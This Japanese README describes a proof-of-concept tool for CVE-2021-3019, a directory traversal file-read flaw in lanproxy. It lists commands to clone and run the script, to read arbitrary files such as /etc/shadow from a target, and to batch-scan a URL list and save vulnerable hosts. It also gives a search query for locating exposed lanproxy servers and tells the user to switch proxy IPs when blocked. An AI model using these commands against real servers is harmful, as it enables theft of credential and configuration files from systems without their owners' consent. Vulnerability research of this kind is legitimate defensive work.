
CVE-2021-3019 lanproxy ディレクトリトラバーサル任意ファイル読み取り脆弱性検出POC
CVE-2021-3019 lanproxy ディレクトリトラバーサル任意ファイル読み取り脆弱性

git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
デフォルトでは引数なしで実行するとヘルプ情報が表示されます

単一のURLに対して脆弱性を検出し、脆弱性が存在する場合はデフォルトで設定ファイルを読み取って出力します
python3 POC.py -u http://127.0.0.1:9100

-rパラメータを使用してシステムの他のファイルを読み取ります。ファイルの絶対パスが必要です。
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow

-fパラメータを使用してバッチ検出し、脆弱性があるものはsuccess.txtファイルに書き込まれます
python3 POC.py -f urls.txt

"Server: LPS-0.1" && title=="ログイン"
Connection reset by peer が発生した場合、ターゲットサーバーにIPがブロックされている可能性が高いです。プロキシIPを切り替えてください。